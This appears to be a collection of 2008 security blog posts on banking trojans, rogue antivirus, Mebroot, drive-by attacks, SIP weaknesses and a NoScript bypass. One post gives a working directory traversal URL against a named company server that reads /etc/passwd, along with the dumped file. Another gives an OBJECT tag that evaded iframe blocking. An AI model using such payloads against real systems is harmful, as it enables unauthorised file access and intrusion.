When phishing was young, many phishers registered lookalike domains, along the lines of bankofamerika.com, login-chase.com, and paypal-account-verification.com.

Eventually most of the phishing gangs moved on to random domains in far-away countries and just prepended the domain to create host names along the lines of www.bankofamerica.com.444hzjr4zp2b8oacgd.org.ve, www.chase.com.host8.asia, and www.paypal.com.dll-s.eu.

But every now and then we run into new fraud sites that are using the old school tricks. Like today, when somebody spammed around e-mails such as these:



The link takes you to sbooff.com, which desperately tries to mimic sboff.com, the official home page of Standard Bank Offshore:



Do note that isn't technically a phishing site, as it doesn't try trick you into entering your details to a fake site. It just tries to convince you to install a "Upgrade Certificate". Which is a program. Which is actually the Trojan-Downloader.Win32.Agent.aiqo banking trojan.

The site has been reported and should be offline soon.

On 06/10/08 At 02:35 PM

Have you tried Chrome? It’s nice! It definately runs gmail faster than Firefox, all the rest I’m still checking.

There was one very cool feature I noticed today that I really liked.
Did your Firefox ever show you the message below? (The answer is probably yes)
Have you EVER read it? (I didn’t, and neither did you…)

Now look at the same message, as it looks in Chrome:

I can’t think of a better way to explain it.
Once you click “Proceed anyway” you get to the website you were looking for, but the address bar keeps reminding you that this is not a safe site:

This explanation is a security warning for regular people that are going to shop online. Not for security experts. Explaining security to the ‘regular people’ is hard. This one is perfect.
I think that the person that thought about this feature is brilliant.

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

I ran into this a few weeks ago and I thought it was just so silly I had to post it. If you telnet to an SSL/TLS enabled port and type in “GET / HTTP/1.0″ and hit enter it immediately responds with this rather poorly thought out error message:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You&aposre speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />

The irony is that it’s saying that it doesn’t know what I’m saying, even though it clearly does know what I’m saying since it tells me what I’m doing wrong. Pretty stupid error messaging and pretty easy to use to fingerprint the web server. Just thought it was funny enough to pass along.

My brother wrote an article injecting some reality into the discussion about the banking crisis on Spiegel Online. The german version can be seen here. I'll share a short summary of his arguments here (and he'll complain about my distortions later ;).

Short version: The article describes why the situation is less dire than many pundits claim, and explains logical fallacies in commonly-heard arguments.

In the following, here's a summary of his arguments, in the form of "Myth --> Reality"

1. The US government is taking on a total of 7000bn in liabilities -- about 5500bn by agreeing to step in for Fannie Mae / Freddie Mac, and about 700bn in papers bought by doing the bailout. This equates to roughly half of US GDP, and since the US is already in debt by about 65% of GDP, this would push the total indebtedness of the US to be clearly past 100% of GDP. As a result, serious doubts would have to be cast on the US governments ability to repay debts and service interest on debt.
   Reality: Most of the 5500bn are backed by "proper" mortgages with decent quality. It is unclear whether the US gov will lose money on the Fannie Mae / Freddie Mac deal at all. Even the 700bn in "toxic assets" the US is willing to buy have some underlying value. Realistic expectations at the total loss for the US government in this deal runs in the area of 500bn, which would be less than 3% of GDP -- and therefore not a significant source of problems.
2. The liquidity that central banks are injecting into the markets should lead to hyperinflation. Reality: The measures to help liquidity in the markets do not increase the money supply in the long run. They are usually short-term credits given to struggling banks for a limited amount of time -- weeks or months. After this time, the creditors have to repay the loans, and the money disappears. At the same time, the willingness by existing banks to lend decreases, thus decreasing the money supply in the economy. The statistics by central banks show that the actual money supply M2 is growing a lot less slowly at the moment in spite of all the liquidity injections. Since the money supply is only growing very slowly at the moment, the inflationary pressures are low.
   
3. The banking crisis is responsible for the overall slowdown in the EU's economy, and the German government is thus not responsible for having to adjust their growth estimates downwards sharply.
   Reality: Most indicators show that the slowdown started way before the crisis reached it's current urgence. The indicators started pointing down much earlier as a result of the heavy increase in energy costs, the appreciation of the euro (and the resulting loss in competitiveness), and Germany's botched reform of accounting rules for writing down investments in equipment. The banking crisis is just the latest "kick" -- but the three previous ones were all known early (and could've been partially corrected).
4. This is the mother of all financial crises. This banking crisis is the worst crisis in several generations, up to the 1930's crash. Reality: Dramatic banking crises are more common than we think. Since 1970, the IWF has counted 42 crashes in countries like Argentina, Indonesia, China, Japan, Finland or Norway. In comparison to these crises, the current crisis isn't even very deep or expensive: The Paulson-bailout comes at a cost of 700bn, not even 5% of GDP, and only a fraction of this will be actually lost. According to the IWF, the average banking crisis in a country came at the cost of 13% of GDP for that country's tax payer. The Indonesian crisis even came in at four times this. The big difference to the other crises is that this one has caught on in the world's biggest economy, and as such reaches unknown dimensions in absolute terms.
   

This is the first in a series of posts covering VoIP.

There are two separate components to most VoIP implementations:

• Signalling, which is communicating call setup and details. (Ex: SIP, H.323)
• Session, which carries the actual media stream and conversation itself. (Ex: RTP)

There are also master/slave protocols that incorporate signalling, but directly control the client hardware or software. With this, the handset or softphone is a dumb terminal where keypresses are sent directly to the host which controls the display and indicator lights. Examples include Nortel’s UNISTIM, and Cisco’s Skinny Client Control Protocol (SCCP).

With this in mind, we can classify VoIP endpoint philisophies as follows:

• Peer to peer - with more intelligence in the phones itself, and using SIP or H.323, the phone can negotiate and initiate calls on its own.
• Dumb endpoints - calls are initiated and negotiated on behalf of the endpoint by the controlling host, the PBX.

In this post, I am going to be focusing on and attempting to distill the essentials of SIP, demystifying it for the security audience who wishes to work with it.

One day, Mario was on his way to visit Princess Peach at her invitation. He saw her standing outside of the Warp Pipe that lead to her Castle. He waved at her. She waved back.

And then, oh no! Bowser’s minions snatched her away!

But fortunately, the Mushroom Kingdom was recently wired for WiFi. So Mario whips out his wireless SIP phone. He calls Toadstool, Peach’s loyal servant. Toadstool is on the local wireless network. Mario pushes the speed dial button for Toadstool, which has Toadstool’s domain name.

Once this has been resolved to an IP address, SIP handshaking happens. SIP is transport independent but is usually carried over UDP. SIP messages are text based in the theory that they are easier to monitor and diagnose, with messaging that is stateless and very alike HTTP.

First, Mario’s phone sends a SIP INVITE packet to Toadstool’s phone. It includes all the details on who is calling, including how to contact the caller. This includes origin and ports. Toadstool’s phone responds with a ‘100 Trying’ and then a ‘180 Ringing’ message. When Toadstool answers the phone, it sends a ‘200 OK’ message. When Mario’s phone receives the OK message, it sends an ACK back. Once this happens, voice on each end is sent to the other via RTP over UDP using the IP and ports set up in advance during the SIP transactions.

“Oh, no!” cried Mario to Toadstool, “Bowser’s minions kidnapped Princess Peach!”

“Again?! We have to teach her how to defend herself. She just hasn’t been herself since Super Mario Brothers 2,” replied Toadstool, “I’ll round everyone up. Luigi is away at the Mario Kart Racing Track though.”

“All right! I’ll call him,” replied Mario to Toadstool and then hung up.

Now, for those of you readers who are rooting for Bowser, was he smart enough to realize that you can spoof UDP packets and CANCEL a call before Toadstool could answer? Or did he understand that SIP packets can be intercepted on a local network, and he could set himself up as the man in the middle? Unfortunately for those of you inclined to cheer for the villain, he is a giant turtle of habit. Body snatching and sending minions out is the extent of his technique.

A pity, for that if he had sent out countless INVITE packets on the Mushroom Kingdom network, he could have shut down the entire phone system and gotten away clean with Princess Peach.

Since Luigi was outside the Cloud Kingdom, when Mario dialed for Luigi, his phone talked to the Mushroom Kingdom SIP Proxy.

The SIP Proxy does resolution for the address provided, which was luigi@mushroom. When Luigi went to the Mario Kart Racetrack, his phone registered itself with the Mushroom Kingdom SIP Proxy. When it registered, it let the proxy know what its IP address is and how to contact it.

So when Mario called Luigi, the SIP proxy resolved according to Luigi’s REGISTER information. The standard SIP handshake is passed back and forth. When it gets to RTP streams is where it gets complicated. The Mushroom Kingdom could be using a STUN server as well. Or their infrastructure could be SIP aware, and open ports accordingly on the Mushroom Kingdom firewall.

“Luigi!” Mario exclaimed and could hear his brother’s kart roaring, “Princess Peach has been kidnapped by Bowser!” And with that, Luigi veered off the race track in pursuit of Bowser’s minions.

Those that are more fond of turtles than plumbers would be saddened to note that Bowser could have impersonated as Luigi on the SIP proxy if he had stolen his credentials. Or Bowser could have spoofed Luigi’s IP address, and Mario’s brother would have kept racing on.

Using the superior communications network, they were able to catch up with Bowser’s koopas and jump on their heads. Mario was rewarded by a kiss from Princess Peach!

I hope you enjoyed reading the story as much as I enjoyed writing it. I hope that this will clarify SIP for some of my readers, and open your eyes as to some of the attack vectors inherent in SIP.

All characters and places used are copyrighted by Nintendo.

The background sprites are credited to GordonBlazin@aol.com

The character sprites are credited to davidjclarke@gmail.com

Greetings from Ottawa.



The antivirus industry's most important annual conference — Virus Bulletin — is in full swing.



It seems incredible but this is my 15th VB — and I have the card to prove it!

  

Pretty much everybody is here — as can be seen from this excellent video shot by the Sophos gang. The video was shown in the annual gala dinner last night — be sure to check it out.

This year, we had our Kimmo Kasslin deliver a presentation on the opening day of the conference.



The audience seemed quite astonished to hear the full story behind the most advanced malware we've seen so far: Mebroot. Kimmo characterized it as a "Commercial-grade framework" and as a "Malware Operating system".

The research needed to fully understand this malware was done as a joint operation between F-Secure and Symantec. Our fellow, Kimmo, worked together with Elia Florio from Symantec Security Response in this great example of cross-industry co-operation.

Details of Mebroot functionality uncovered in the presentation included:

• Mebroot is the most advanced and stealthiest malware seen so far
  
• It operates at the lowest level of the Windows operating system
  
• Mebroot writes its startup code to the first physical sector on the hard drive
  
• When an infected machine is started, Mebroot loads first and survives through the Windows boot
  
• Mebroot hides all changes made to the infected system
  
• It heavily uses undocumented features of Windows
  
• It creates a complex network communication system, involving pseudo random domain names
  
• Large parts of the code is highly obfuscated
  
• Mebroot uses a very complex installation mechanism, trying to bypass security products and to make automatic analysis harder
  
• All botnet communication is encrypted with advanced encryption mechanism
  
• The malware has apparently gone through extensive quality assurance. It never seems to crash the systems it infects, even though it runs at the kernel level
  
• The Mebroot gang has so far registered around 1000 com/net/biz domain names for their communication needs
  
• The botnet backdoor functionality is very powerful, even allowing the upload and execution of arbitrary kernel-mode modules
  
• As a payload, Mebroot attacks over 100 European online banks, trying to steal money as users do their online banking on infected machines

The authors of Mebroot remain unknown at this time. However, it's obvious they are well organized and well funded.

To download the slide set prepared by Kimmo and Elia, click on the image below.



Signing off,
Mikko

P.S. This would seem like a great opportunity to plug another conference: T2 will be held in Helsinki later this month and Kimmo will be talking there as well, on the Evolution of Kernel-Mode Malware. The agenda as a whole looks very good, take a look.

On 03/10/08 At 01:08 PM

The group using name The Hacker’s Choice has managed to clone a biometric passport with name Elvis Presley. Right - The King who died 31 years ago
Demonstration video and some technical information here.

-

Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.



We've seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal with a 3172 rank in Alexa. The JavaScript injection attack successfully exploited one of MegaGames' servers to insert a couple extra lines of code. This addition redirects unsuspecting website visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).



This attack would only affect website visitors using versions of Microsoft's Internet Explorer (IE) browser, as the website basically requires visitors to use an ActiveX Control, then uses a loophole in the way the ActiveX Control interacts with the IE browser to provide remote attackers complete control over a victim's system.

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser's type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system.



The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit "obviously risky" (dodgy) websites, such as "pr0n" or "warez" sites. Unfortunately, that's not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe — BusinessWeek.com — a very legitimate and high traffic site. It has fallen victim to an SQL Injection attack, and such attacks inject JavaScript…

The Register has more details.

Web Security team post by — Choon Hong

On 18/09/08 At 09:13 AM

We've been investing a lot of time recently in a Security Awareness Drive at local university campuses, to create more awareness about information security issues in Malaysia.



So far, the response from the students has been encouraging. Still, we wanted more students to get interested in this field, both academically and career-wise — so we thought, what better way to do it than to use information security as the topic for a competition where the grand prize is a paid trip to Helsinki, Finland, complete with a brand spankin' new laptop?

To that end, we've been involved in organizing the upcoming Malaysian National Inter Varsity Security Tech Quiz Championship, which will take place towards the end of 2008. The competition is open to teams of students from all private and public universities in Malaysia, who will compete through four rounds of increasingly tough questioning. Teams will be eliminated in each round, until one team of four students is left standing in the grand finale — and then it's off to Finland they go!

To win a round, the teams need to correctly answer questions revolving around security for mobile phones, desktops and laptops, and online threats. Practically, the questions will include everything from general security terms to landmark events in computer security history, malware characteristics and computer trivia. If we feel the teams are having too easy a time, we even have a list of "Almost Impossible" questions to throw in, to make things more interesting! We're looking forward to the Tech Quiz Championship and will probably post an update nearer to the event date.

On 15/09/08 At 02:36 AM

Where does today's batch of spam and phishing come from?

Let's plot them out with Google Earth.



You can download today's KML data file from: spam and phishing 2008.09.12 (3731k file).

On 12/09/08 At 02:35 PM

Holo is one of our Database Update Publishers (DUP).

This is him:



He's out this afternoon taking part in the Helsinki office's annual golf tournament.

So who's publishing the AV database updates in the meantime???

Azidin, one of the DUPs from our Kuala Lumpur team. He's been working remotely with the Helsinki shift today.

So we just realized something, September 13th will mark our Malaysian office's two year anniversary.

Working with counterparts from across the world has become second nature to us since then…

Good luck to Holo and thanks to Azidin!

On 11/09/08 At 04:09 PM

The 2008 US Presidential Election is well on its way, and what news could be more enticing than an alleged sex scandal involving one of the candidates?

The latest e-mail spam run on the loose contains a link to an supposed pornographic video of Democratic candidate Senator Barack Obama.

In order to conceal the trojan's primary intent, a pornographic video will be opened once the file is downloaded and executed. Along with the video named 01.wmv, the trojan drops another malicious file onto the system called 809.exe. Next, it registers the file siemens32.dll as a Browser Helper Object (BHO).

As a result, every time Internet Explorer is launched, the malicious BHO is being referenced. As soon as the user connects to specific banking sites, especially well-known banks in Germany, the trojan collects the information gathered from the bank transactions then posts it to the "Medved Hotel", Finland.



Interestingly, there is no Medved Hotel in Finland. The website, however, looks real enough to fool unsuspecting users and the layout was apparently borrowed from a real Finnish Hotel, Bear Inn, in order to make a bogus site out of it.



Can you spot the difference? Both the websites are almost the same except for the discrepancy on the right side of the page.

Currently, we have reported this to local authorities and they are working on getting the site shut down. All of the malicious files mentioned are detected as Trojan-Spy:W32/Banker.ISO.

Response Team post by — Mark

On 10/09/08 At 06:25 AM

So, let's say you get an e-mail from your bank, asking to confirm your details.

You follow the link and end up at a site such as this:



Looks good.

Let's have a closer look at the domain information.



Turns out the bank site is hosted in Hong Kong. Which is not itself suspicious, I guess…

And the domain was registered yesterday. That could be a coincidence.

The nameservers of the site are hsiaf5978.com, fgtvj4737.com and hsa9gdfg3.com…erm…which isn't necessarily a bad thing.

And the administrator's e-mail address is newlolita2008@gmail.com. Ho hum.

Avoid.

On 09/09/08 At 12:46 PM

Our 2009 consumer products were official launched last Wednesday and there are a number of technological enhancements within.

The lab has been busy working with core improvements inside our scanning engines for several months now, and we are very satisfied to see it yielding results so soon.

We scored very well in AV-Test.org's latest results. More importantly, we're improving on our own already good results.

2009's scanning engines detect more, and do it faster.

From AV-Test.org:



"Outside" improvements have been implemented as well.

Our marketing team did some research for the 2009 packaging and developed a better box.

Dr. Tuula Pohjola of the Helsinki University of Technology was approached to perform a life cycle assessment (LCA). Keep an eye on the pressroom for the full details, coming soon.

For now, the basic details are as such — on-demand digital production techniques, local raw materials, plant-based inks, and it's easily recycled. Very nice.

It looks very nice too, as seen in this photo with two of our Helsinki office employees, Weronika and Niina.





You can find more pictures (of the boxes) from our marketing pages.

On 08/09/08 At 11:49 AM

WinDefender 2008 was the subject of yesterday's post. It's a rogue security application, and part of an ever increasing consumer scam.

A search for "Really Legal Stuff" ties WinDefender 2008 to Antivirus XP 2008, another persistent and very nasty rogue.



Here's another *really* related rogue, Spyware Guard 2008.



Spyware Guard 2008's legal page makes references to Pandora Software.

There are other rogue websites that refer to Pandora Software, and claim it to be located in Dortmund, Germany with a support contact of Oleg Dvorezky. Right… sure.

Whois records list the registrant of Pandora as Trans Eurogroup S A with a physical address of Victoria, SC. Where the heck is SC? It's the Republic of Seychelles, an archipelago nation that's located in the Indian Ocean.

On sites that refer to Pandora Software, you'll also find many cross-references to Innovagest2000. The innovagest2000.com website lists their contact address as Madrid, Spain.

Innovagest2000 claims to provide simply the best entertainment online. And just what kind of entertainment do they provide?

Entertainment such as SystemDefender, yet another rogue. More scareware.



Oh no, 324 threats! Is it the animation that's supposed to be fun… ?

It isn't that much fun if you click on the Free Scan Now button.

Do that and you'll get a file that we detect as Trojan-Downloader.Win32.Adload.ma.



Trojan-downloaders are kind of a killjoy when it comes to entertainment.

SysCleaner's website is also one of Innovagest2000's efforts from the looks of it.



Huh. SysCleaner also detects 324 things to fix, just like SystemDefender does. Guess that's part of the entertainment.

Using a selection of text from SysCleaner's privacy policy page, we located another batch of rogues.

AntiMalware 2009



Total Eliminator



eKerberos



FileShredder 2008



Andromeda AntiVirus



Real Antivirus



PC Antispy



Another selection of text from these sites yields many search results that are definitely not safe for work, i.e. pornography. Really obscene stuff. Morally upright citizens of the world, these guys — not.

The company that provides this so called entertainment is urbangestdesarrollos.com. The Urbangestdesarrollos site, which also claims a contact address of Madrid, Spain, is a carbon copy of Innovagest2000. Both Urban and Innova state that credit card statements may show New Concept Business SL.

New Concept Business S.L. claims to be from Barcelona, Spain. Hmm, Spain again. Whois records list the location as Barcelona but the contact person is located in Amsterdam, ES and has a phone number starting with +1.800.

ES as in Spain? Amsterdam, Spain? With a US toll-free phone number? Right, that's probably accurate, you think?

These creeps are really anonymous.

Which brings us to this bit of news: Microsoft and Washington state are suing scareware purveyors.

And just who is the target of their lawsuit? Texas-based Branch Software and its owner James Reed McCreary. RegistryCleanerXP is the name of his scareware application. The Whois information for registrycleanerxp.com, which is still online by the way, actually seems to have legitimate contact details.

Why isn't McCreary more anonymous? It's probably because he isn't the worst of the scareware that's out there. Yeah, he's guilty of deceptive and misleading advertising, and we're happy to see something being attempted, but there's lots worse out there.

The lawsuit against McCreary could very likely devolve into a First Amendment speech case attempting to define deceptive practices, and then eventually he'll walk. Just like spam king Jeremy Jaynes, who had his spam conviction overturned a few weeks ago. Jaynes was incredibly guilty, and yet the Virginia law just wasn't good enough. Too broad.

We can always hope that Washington has better laws, and a judge that understands all of the technical details, but we aren't holding our breath while waiting for the results.

What about the worst of the purveyors? The ones behind stuff such as Antivirus 2009, Malwarecore, WinDefender, WinSpywareProtect and XPDefender?

Brian Krebs' has the key details, as he very often does, in this Security Fix post.

In a separate action, Microsoft filed five "John Doe" lawsuits to learn the identities of individuals responsible for marketing other scareware products.

Oh, John Doe lawsuits. That will take care of the problem, no? Once we learn the identities of the individuals, we'll just have to track them down in Dortmund/Madrid/Barcelona/Victoria/Amsterdam in Germany/Spain/Seychelles… and that's just the supposed locations for the John Does involved with the WinDefender chain of apps.

The Antivirus 2009 gang… is located in an entirely different set of European countries.

We applaud the effort, but we think it's going to take a lot more than the Attorney General of Washington to fix this problem. The Internet has no borders. Perhaps the effort would be better spent to create an international agency with the enforcement power to shut down rogue sites, many of which are hosted in the US?

Here's some final screenshots for you. Do see the tiny little red asterisk above the "y" in the word "Utility"?



That's a disclaimer.



Is the text to small for you to read?

It says Typical system scan that shows how the real WinDefender product will be scanning your computer. Advertising purposes only.

John Doe truly has no shame.

On 01/10/08 At 06:54 PM

WinDefender 2008 is a rogue application. Rogues are also sometimes known as scareware.



Looks sort of familiar, doesn't it? Do you recognize the shape of the box?

The website creators appear to have "borrowed" a few things.

Let's check out the legal disclaimer.



Hey — Really Legal Stuff — That's impressive. From where else we can find really legal stuff?



Oh, Antivirus XP 2008. That particular rogue is a huge pain in the… neck.

The guys that produce this stuff are crooks and swindlers.



Here's a tip: If they claim to be REALiable — they're probably FAKE.

P.S. Performing a search for "really legal stuff" produces some very interesting but definitely NOT safe for work results.

Avoid following the links.

On 30/09/08 At 04:16 PM

Now here's something we don't see every day.

It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.

Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.

Worm.Win32.AutoRun.nox has a payload that restores the original function pointers back to the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.

As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different — it uses "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, its rather unique to see such a technique being used.

This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update patched the vulnerability.



After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.

If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.

Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.

This attack will only work on unpatched machines running without the latest updates. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately.

Foresight? From: http://technet.microsoft.com/en-us/library/cc750820.aspx

"With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode."

Response team post by — Lordian, Kimmo, Antti ...and Mika

On 26/09/08 At 02:52 PM

You're not listening to what we're saying at all.

We quite clearly told you in our last blog post not to post the address "info@bulk-mail.org" to a public web page.

Now look what you've done. The address is all over the web and all over the blogosphere.

Please try to pay more attention in the future.

On 22/09/08 At 09:14 AM

Spam is still a problem.

Problem is, spam still works. So it won't be going away any time soon.

One spam vendor was recently spamming (yes) their own ads to a few million e-mail addresses. The message contained this PDF file:



Two things worthy of noting here:

First: The old e-mail spam vendors are selling mobile phone text message spam lists as well.

Second: The vendor here is trying to avoid getting spammed themselves, by writing their e-mail address
(which is info@bulk-mail.org) as info [at] bulk-mail [dot] org.

We suppose they are worried that an e-mail collecting spider might find their e-mail address (info@bulk-mail.org) and add it to a spam database. Then their address (which was info@bulk-mail.org) would get spam too. We guess.

Anyway, their address seems to be info@bulk-mail.org. Make sure you don't post it to a public web page or they might otherwise get spam.

On 19/09/08 At 03:06 PM

Today is the official launch day for our 2009 consumer lineup. Lots of work has gone into the launch, and plenty more has gone into the development. We'll have some details on the technology for you later.

In meantime, check out our Online Wellbeing campaign.

On 03/09/08 At 03:51 PM

Writing about hacking and security isn't like anything else. It's cool and depressing, fun and dangerous at the same time. You'll never know what to expect. That's the beauty of it I guess. Since application hacking is quite well known by now, it depresses me very much to encounter things I am to speak about.

My first directory traversal was around 1999 when I more or less found myself intrigued by web applications and was pretty stunned that I could hack Cisco from a browser instead of a terminal. Imagine that you know, without any GNU/Linux skills running Netscape on some Windows box trying to proof-root Cisco and send them my findings. And guess what, they never replied back. Maybe the hole is still open after all these years, who knows. It's fair to conclude that programmers still suck at security and it's likely not going to change any time soon. But the biggest problem for hackers or security pentesters is the way they have to contact a company to notify them of their security issues. To be honest, I never got a honest mail back, from no-one besides a couple of threats. One of them was Bank Of America, who pulled the plug on this very website. But I guess that comes with the territory. In the real world everyone would be happy if your neighbors notify you, that you forgot your house keys on the outside of the front door. But no, not in Internet land.

A reader called haykuro, contacted me one month ago about a gaping hole on the Philips domain. A classic directory traversal vulnerability. While that wasn't enough, I tried to be an upstanding citizen and contacted Philips. Which turns out to be virtually impossible. They seem to have really good human resource firewalls, but lack proper application firewalls. They never got back to me even when I said that I will disclose it unto the net. So, one month later and it's still not fixed. I took a couple of hours to write mails back and forth, all in vain. Now I got only one thing to say: go suck on it!

Directory traversal:

http://www.trimension.philips.com/index.php?page=../../../../../../etc/passwd

Notice that the passwords are shadowed. At least they got that right. A shadowed password is indicated as an X. This means that the passwords aren't visible in the passwd file but reside in the shadow file. Nonetheless, you can obtain any file you want.

passwd file:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin 

daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt 

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: 

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:

/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin 

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin

/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory

 owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin 

netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD 

Daemon:/:/sbin/nologin ident:x:100:101::/home/ident:/sbin/nologin 

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var

/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:

/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var

/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin 

apache:x:48:48:Apache:/var/www:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin 

administrator:x:201:201::/home/administrator:/bin/bash fhsvct:x:203:203::/home/fhsvcs:

/bin/false webstats:x:250:250::/var/ossec:/sbin/nologin

Recently I discussed the general problems of objects and it's context in which they maybe behave like IFRAMES. Strictly speaking HTML's multimedia features allow the OBJECT HTML to include images, iframes, applets, and other rich content like Flash and movie clips. Previously HTML did allow content to be fetched from an applet as well. To embed another document, whether local or remote, we can utilize the IFRAME, the FRAMESET, EMBED or the OBJECT.

Generic embedding of content.

The w3c specification below shows all possible attributes that are allowed for an OBJECT[1]

<!ELEMENT OBJECT - - (PARAM | %flow;)*

 -- generic embedded object -->

<!ATTLIST OBJECT

  %attrs;                              -- %coreattrs, %i18n, %events --

  declare     (declare)      #IMPLIED  -- declare but don't instantiate flag --

  classid     %URI;          #IMPLIED  -- identifies an implementation --

  codebase    %URI;          #IMPLIED  -- base URI for classid, data, archive--

  data        %URI;          #IMPLIED  -- reference to object's data --

  type        %ContentType;  #IMPLIED  -- content type for data --

  codetype    %ContentType;  #IMPLIED  -- content type for code --

  archive     CDATA          #IMPLIED  -- space-separated list of URIs --

  standby     %Text;         #IMPLIED  -- message to show while loading --

  height      %Length;       #IMPLIED  -- override height --

  width       %Length;       #IMPLIED  -- override width --

  usemap      %URI;          #IMPLIED  -- use client-side image map --

  name        CDATA          #IMPLIED  -- submit as part of form --

  tabindex    NUMBER         #IMPLIED  -- position in tabbing order --

  >

Embed content via an OBJECT.

Normally, CODEBASE and CLASSID are used to fetch data for an OBJECT, similarly for APPLETS. However, the DATA attribute makes it possible to render an OBJECT as an embedded IFRAME as we can see in the example below. In figure 1 we see a regular IFRAME that is successfully blocked by NoScript. Figure 2 shows an OBJECT that is rendered as an IFRAME, successfully bypassing the IFRAME protection.



The code below allows for remote embedding as seen in figure 2.

<object data="http://www.google.com" width="200" height="200"></object>

This will successfully fetch the document residing on a remote server, and start to act as an IFRAME. The latest version of NoScript allows it's users to block iframes in order to protect themselves from "Clickjacking". Whether or not Clickjacking works with Iframes, I do not know since the details are not released by Hansen, Grossman et al[2]. Certainly NoScript's current protection will fail if an OBJECT is used to replace an IFRAME, making it vulnerable for bypassing it's protection a priori.

Moreover, it is important to know that one does not need Javascript to hijack "clicks" or other mouse-events. I discussed hijacking events on a LABEL element to pass the event through to a submit button, exactly one month ago[3] This way, one is able to hijack user events to perform a CSRF for example, or hijack forms/iframes with it[4], and is nearly impossible to prevent because it does not rely on Javascript at all.

Fix.

Giorgio released a fix for NoScript. You can download the latest version of NoScript with additional protection right here: 1.8.1.9, upgrade

[1] http://www.w3.org/TR/REC-html40/struct/objects.html
[2] http://ha.ckers.org/blog/20080915/clickjacking/
[3] http://www.0x000000.com/index.php?i=312
[4] http://trickeries.com/216/an-interesting-csrf-attack/

Hi!

I am Stephen A. Ridley. I recently started here at Matasano as a Senior Researcher (working out of the Manhattan office). I studied Physics, but for work I do software reversing, protocol replication, and exploit development. Before Matasano, I was at McAfee as a Senior Security Architect, in a small (5 person) R&D group learning from all-stars like Mark Dowd, John Viega, and David Coffey. Prior to McAfee I was at Aegis Research (which became ManTech Security and Mission Assurance) supporting the U.S. Defense and Intelligence communities doing reversing and vuln research. I got the opportunity to do all kinds of other neat stuff there, but mostly I got to be batboy for all the grand slammers on that team.

Here at Matasano, I again find myself fortunate enough to be on another phat team. I (probably like most of you) came up following groups like Teso, #ADM, and antisec.is while getting amused by groups like b4b0, ~el8, and gob bles. Also, like many folks in this industry, my motivation tends to wax and wane, limboing between states of limerence and ‘jaded disillusionment’. (If you remember, for a while folks thought it was all over after ~2001…but here we are.)

While the game is definitely different now, there is still some inspiring stuff being done. Most recently some of the public discoveries and techniques I found to be pretty re-inspiring in different ways were:

• Barnaby Jack’s ARM stuff (new architecture work)
• G D I + (simple bugs, big impact)
• Dan’s DNS cache (application level bugs)
• Dino’s quicktime (new platform work)
• Kostya’s kernel pools/IGMP (new exploitation techniques)
